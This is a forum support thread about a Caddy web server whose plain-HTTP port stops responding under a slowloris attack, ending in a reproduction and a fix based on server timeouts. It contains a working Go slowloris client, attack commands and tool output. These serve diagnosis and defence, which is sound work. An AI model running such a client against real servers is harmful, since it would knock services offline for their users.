Non-TLS vulnerable to slowloris attack

Hey, I’ve got a Caddy web server running two proxies: one with TLS (port 443) and one without (port 80). When port 443 is attacked by slowloris, the server performs fine and keeps serving without issues. When port 80 is attacked by slowloris, Caddy stops responding to requests on it, while the proxy on port 443 keeps working fine. The two configurations are identical apart from TLS being on or off; both have rate limiting and logging enabled. If anybody could help me resolve this issue, that would be greatly appreciated. Thanks.

Hi, can you show us your Caddyfile and the requests you initiated to see this behavior? Also the client (or client code) you’re using. I want to make sure we reproduce what you’re seeing first.

Sure! Thanks for the quick reply.

censored:80 {
	proxy / censored:80 {
		proxy_header Host {host}
		proxy_header X-Real-IP {remote}
		proxy_header X-Forwarded-Proto {scheme}
	}

	log
	ratelimit / 3 10 second

	tls off
}

censored {
	proxy / censored:80 {
		proxy_header Host {host}
		proxy_header X-Real-IP {remote}
		proxy_header X-Forwarded-Proto {scheme}
	}

	log
	ratelimit / 3 10 second

	tls censored {
		protocols tls1.0 tls1.2
	}
}

The script used is slowloris, a small Perl attack tool:

https://github.com/llaera/slowloris.pl
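
For anyone not familiar with the technique: the slowloris idea is simply to open a lot of connections, send an incomplete HTTP request on each one, and then keep trickling header bytes so the server never considers any of the requests finished. A rough Go sketch of that idea (not the Perl script itself; the target address, connection count, and delays below are placeholders) looks like this:

// slowclient.go: a rough sketch of the slowloris idea, for illustration only.
// It opens many TCP connections, sends an incomplete HTTP request on each,
// then keeps trickling header bytes so the server never sees the request end.
// The target host, connection count, and delays are placeholders.
package main

import (
	"fmt"
	"net"
	"time"
)

func main() {
	target := "example.com:80" // placeholder target
	const numConns = 200       // placeholder; real tools open thousands

	var conns []net.Conn
	for i := 0; i < numConns; i++ {
		c, err := net.DialTimeout("tcp", target, 5*time.Second)
		if err != nil {
			fmt.Println("dial failed:", err)
			break
		}
		// Start an HTTP request but never finish the header block.
		fmt.Fprint(c, "GET / HTTP/1.1\r\nHost: example.com\r\n")
		conns = append(conns, c)
	}

	// Periodically send one more bogus header line on every connection
	// so the server keeps waiting for the rest of the request.
	for {
		time.Sleep(10 * time.Second)
		for _, c := range conns {
			fmt.Fprint(c, "X-a: b\r\n")
		}
	}
}

Each held-open connection ties up one of the server's connection slots and file descriptors, which is the whole point of the attack.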

Thanks. What was the command you used? I’m having trouble seeing the same thing on my end. What was the output of the slowloris command?

slowloris.pl -dns :80 & slowloris.pl -dns :443

OUTPUT:

Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client by Laera Loris
Defaulting to port 80.
Defaulting to a 5 second tcp connection timeout.
Defaulting to a 100 second re-try timeout.
Defaulting to 1000 connections.
Multithreading enabled.
Connecting to leetv2api2.leet.cc:80:80 every 100 seconds with 1000 sockets:
Building sockets.
Building sockets.
(…the “Building sockets.” line repeats many more times…)

The log does not contain anything related to the attack. If need be, I’m also willing to give you a live demonstration. Thanks for the help!

And now, of course, I am having trouble replicating the issue once again, as is the nature of computers :)

The address in that output (leetv2api2.leet.cc:80:80) is malformed. Maybe that’s why?

Thanks for responding quickly. If you can confirm that there is in fact an issue here, please come back ASAP - I have a new release going out Monday or Tuesday. Thank you!

I just did a slowloris experiment against a Caddy 0.9.4 server running in a local Vagrant box.

I launched caddy with: ulimit -n 8192 && /srv/caddy/caddy_linux_amd64
Verified in /proc/***/limits that the ulimit worked.

My Caddyfile:

http://vagrant {
    root /srv/hc-wwwroot
    gzip
    proxy / 127.0.0.1:8080 {
        except /static /robots.txt
        header_upstream Host {host}
    }
}

Instead of the original slowloris.pl I used Pyloris, but the idea is the same – launch a lot of slow requests. After it had created ~8000 connections, my browser started showing “502 Bad Gateway” and the caddy process was printing:

Activating privacy features... done.
http://vagrant
22/Jan/2017:12:17:37 +0000 [ERROR 502 /about/] dial tcp 127.0.0.1:8080: socket: too many open files
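
That error fits what the attack is doing: every stalled client connection holds a file descriptor, and once the caddy process reaches its descriptor limit, new dials to the upstream at 127.0.0.1:8080 fail, which is what shows up as the 502s in the browser. A tiny Go sketch (with an artificially low limit, Linux/macOS only, unrelated to Caddy’s own code) reproduces the same failure mode:

// fdlimit.go: illustrates why the 502s say "too many open files".
// We lower our own descriptor limit, then keep opening connections to a
// local listener until a new dial fails, just like caddy's upstream dials
// did once the slowloris connections had used up all available descriptors.
package main

import (
	"fmt"
	"net"
	"syscall"
)

func main() {
	// Artificially low limit so the failure shows up quickly (Linux/macOS).
	lim := syscall.Rlimit{Cur: 64, Max: 64}
	if err := syscall.Setrlimit(syscall.RLIMIT_NOFILE, &lim); err != nil {
		fmt.Println("setrlimit:", err)
		return
	}

	ln, err := net.Listen("tcp", "127.0.0.1:0")
	if err != nil {
		fmt.Println("listen:", err)
		return
	}
	go func() {
		for {
			if _, err := ln.Accept(); err != nil {
				return
			}
		}
	}()

	var held []net.Conn
	for i := 0; ; i++ {
		c, err := net.Dial("tcp", ln.Addr().String())
		if err != nil {
			// Typically: "dial tcp ...: socket: too many open files"
			fmt.Printf("dial #%d failed: %v\n", i, err)
			return
		}
		held = append(held, c) // keep the connection open, like a slow client does
	}
}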

Can you share your Pyloris code? As soon as I can verify this I will issue a fix. And if you give me the code immediately, I can have the fix out by tomorrow or Tuesday.

I cloned this repo: Anonymous-Dev/Pyloris on GitHub (a web stress testing tool with scripting support).
Launched it like so: ulimit -n 20000 && python pyloris.py

In the Tkinter GUI window I changed the host address, bumped the default limits from 500 to 10000, and reduced the time delays to speed things up. Here’s how it looked:

[screenshot of the Pyloris settings window]

Thanks @cuu508! I’ll have a fix out early next week.

This should be fixed now with https://github.com/mholt/caddy/pull/1368. Thank you!
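
For anyone who finds this thread later: the general mitigation for slowloris is server-side timeouts, so connections that never finish sending a request get closed instead of piling up until descriptors run out. In plain net/http terms the idea looks roughly like the sketch below (illustrative values only; not necessarily how the linked PR implements it):

// timeouts.go: the general slowloris mitigation in net/http terms.
// A sketch of the idea only, not a copy of the Caddy change: give the
// server deadlines so slow clients are dropped instead of holding
// connections (and file descriptors) open indefinitely.
package main

import (
	"fmt"
	"log"
	"net/http"
	"time"
)

func main() {
	srv := &http.Server{
		Addr:              ":8080",
		ReadHeaderTimeout: 10 * time.Second, // drop clients that trickle header bytes
		ReadTimeout:       30 * time.Second, // cap time to read the whole request
		WriteTimeout:      30 * time.Second, // cap time to write the response
		IdleTimeout:       2 * time.Minute,  // reap idle keep-alive connections
		Handler: http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
			fmt.Fprintln(w, "hello")
		}),
	}
	log.Fatal(srv.ListenAndServe())
}

The specific durations are a matter of taste for each site; the important part is that the server no longer waits forever for request bytes, which is exactly the wait that slowloris exploits.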

